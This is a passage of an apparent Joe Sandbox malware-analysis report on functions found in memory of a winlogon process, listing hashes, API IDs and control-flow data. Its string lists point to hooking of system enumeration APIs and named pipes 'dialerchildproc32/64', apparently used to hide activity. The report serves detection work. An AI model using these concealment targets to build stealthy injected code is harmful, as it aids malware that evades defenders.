                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                          Function 000001E858987D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                          Function 000001E85898D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                          Function 000001E858987960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                          Function 000001E85898DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                          Function 000001E8589636F0 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14
                                                                          Function 000001E8589812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00
                                                                          Function 000001E858981D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50
                                                                          Function 000001E8589B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 571 1e8589b6910-1e8589b6916 572 1e8589b6951-1e8589b695b 571->572 573 1e8589b6918-1e8589b691b 571->573 576 1e8589b6a78-1e8589b6a8d 572->576 574 1e8589b6945-1e8589b6984 call 1e8589b6fc0 573->574 575 1e8589b691d-1e8589b6920 573->575 594 1e8589b6a52 574->594 595 1e8589b698a-1e8589b699f call 1e8589b6e54 574->595 577 1e8589b6922-1e8589b6925 575->577 578 1e8589b6938 __scrt_dllmain_crt_thread_attach 575->578 579 1e8589b6a8f 576->579 580 1e8589b6a9c-1e8589b6ab6 call 1e8589b6e54 576->580 582 1e8589b6931-1e8589b6936 call 1e8589b6f04 577->582 583 1e8589b6927-1e8589b6930 577->583 586 1e8589b693d-1e8589b6944 578->586 584 1e8589b6a91-1e8589b6a9b 579->584 592 1e8589b6ab8-1e8589b6aed call 1e8589b6f7c call 1e8589b6e1c call 1e8589b7318 call 1e8589b7130 call 1e8589b7154 call 1e8589b6fac 580->592 593 1e8589b6aef-1e8589b6b20 call 1e8589b7190 580->593 582->586 592->584 605 1e8589b6b22-1e8589b6b28 593->605 606 1e8589b6b31-1e8589b6b37 593->606 599 1e8589b6a54-1e8589b6a69 594->599 603 1e8589b69a5-1e8589b69b6 call 1e8589b6ec4 595->603 604 1e8589b6a6a-1e8589b6a77 call 1e8589b7190 595->604 621 1e8589b6a07-1e8589b6a11 call 1e8589b7130 603->621 622 1e8589b69b8-1e8589b69dc call 1e8589b72dc call 1e8589b6e0c call 1e8589b6e38 call 1e8589bac0c 603->622 604->576 605->606 610 1e8589b6b2a-1e8589b6b2c 605->610 611 1e8589b6b39-1e8589b6b43 606->611 612 1e8589b6b7e-1e8589b6b94 call 1e8589b268c 606->612 617 1e8589b6c1f-1e8589b6c2c 610->617 618 1e8589b6b45-1e8589b6b4d 611->618 619 1e8589b6b4f-1e8589b6b5d call 1e8589c5780 611->619 632 1e8589b6b96-1e8589b6b98 612->632 633 1e8589b6bcc-1e8589b6bce 612->633 624 1e8589b6b63-1e8589b6b78 call 1e8589b6910 618->624 619->624 636 1e8589b6c15-1e8589b6c1d 619->636 621->594 644 1e8589b6a13-1e8589b6a1f call 1e8589b7180 621->644 622->621 674 1e8589b69de-1e8589b69e5 __scrt_dllmain_after_initialize_c 622->674 624->612 624->636 632->633 641 1e8589b6b9a-1e8589b6bbc call 1e8589b268c call 1e8589b6a78 632->641 634 1e8589b6bd0-1e8589b6bd3 633->634 635 1e8589b6bd5-1e8589b6bea call 1e8589b6910 633->635 634->635 634->636 635->636 653 1e8589b6bec-1e8589b6bf6 635->653 636->617 641->633 668 1e8589b6bbe-1e8589b6bc6 call 1e8589c5780 641->668 661 1e8589b6a21-1e8589b6a2b call 1e8589b7098 644->661 662 1e8589b6a45-1e8589b6a50 644->662 658 1e8589b6c01-1e8589b6c11 call 1e8589c5780 653->658 659 1e8589b6bf8-1e8589b6bff 653->659 658->636 659->636 661->662 673 1e8589b6a2d-1e8589b6a3b 661->673 662->599 668->633 673->662 674->621 675 1e8589b69e7-1e8589b6a04 call 1e8589babc8 674->675 675->621
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700
                                                                          Function 000001E858956910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 464 1e858956910-1e858956916 465 1e858956918-1e85895691b 464->465 466 1e858956951-1e85895695b 464->466 468 1e85895691d-1e858956920 465->468 469 1e858956945-1e858956984 call 1e858956fc0 465->469 467 1e858956a78-1e858956a8d 466->467 470 1e858956a9c-1e858956ab6 call 1e858956e54 467->470 471 1e858956a8f 467->471 473 1e858956938 __scrt_dllmain_crt_thread_attach 468->473 474 1e858956922-1e858956925 468->474 487 1e85895698a-1e85895699f call 1e858956e54 469->487 488 1e858956a52 469->488 485 1e858956aef-1e858956b20 call 1e858957190 470->485 486 1e858956ab8-1e858956aed call 1e858956f7c call 1e858956e1c call 1e858957318 call 1e858957130 call 1e858957154 call 1e858956fac 470->486 477 1e858956a91-1e858956a9b 471->477 479 1e85895693d-1e858956944 473->479 475 1e858956927-1e858956930 474->475 476 1e858956931-1e858956936 call 1e858956f04 474->476 476->479 496 1e858956b31-1e858956b37 485->496 497 1e858956b22-1e858956b28 485->497 486->477 499 1e858956a6a-1e858956a77 call 1e858957190 487->499 500 1e8589569a5-1e8589569b6 call 1e858956ec4 487->500 491 1e858956a54-1e858956a69 488->491 502 1e858956b7e-1e858956b94 call 1e85895268c 496->502 503 1e858956b39-1e858956b43 496->503 497->496 501 1e858956b2a-1e858956b2c 497->501 499->467 514 1e8589569b8-1e8589569dc call 1e8589572dc call 1e858956e0c call 1e858956e38 call 1e85895ac0c 500->514 515 1e858956a07-1e858956a11 call 1e858957130 500->515 509 1e858956c1f-1e858956c2c 501->509 521 1e858956bcc-1e858956bce 502->521 522 1e858956b96-1e858956b98 502->522 510 1e858956b4f-1e858956b5d call 1e858965780 503->510 511 1e858956b45-1e858956b4d 503->511 517 1e858956b63-1e858956b78 call 1e858956910 510->517 532 1e858956c15-1e858956c1d 510->532 511->517 514->515 567 1e8589569de-1e8589569e5 __scrt_dllmain_after_initialize_c 514->567 515->488 535 1e858956a13-1e858956a1f call 1e858957180 515->535 517->502 517->532 530 1e858956bd5-1e858956bea call 1e858956910 521->530 531 1e858956bd0-1e858956bd3 521->531 522->521 529 1e858956b9a-1e858956bbc call 1e85895268c call 1e858956a78 522->529 529->521 561 1e858956bbe-1e858956bc6 call 1e858965780 529->561 530->532 546 1e858956bec-1e858956bf6 530->546 531->530 531->532 532->509 554 1e858956a45-1e858956a50 535->554 555 1e858956a21-1e858956a2b call 1e858957098 535->555 551 1e858956bf8-1e858956bff 546->551 552 1e858956c01-1e858956c11 call 1e858965780 546->552 551->532 552->532 554->491 555->554 566 1e858956a2d-1e858956a3b 555->566 561->521 566->554 567->515 568 1e8589569e7-1e858956a04 call 1e85895abc8 567->568 568->515
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                          Function 000001E85898CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                            • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                            • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                            • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                          Function 000001E858982244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                          Function 000001E8589B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                          Function 000001E858959944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                          Function 000001E85898A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                          Function 000001E85898F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                          Function 000001E85898104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                          Function 000001E85898D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                          Function 000001E858987510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
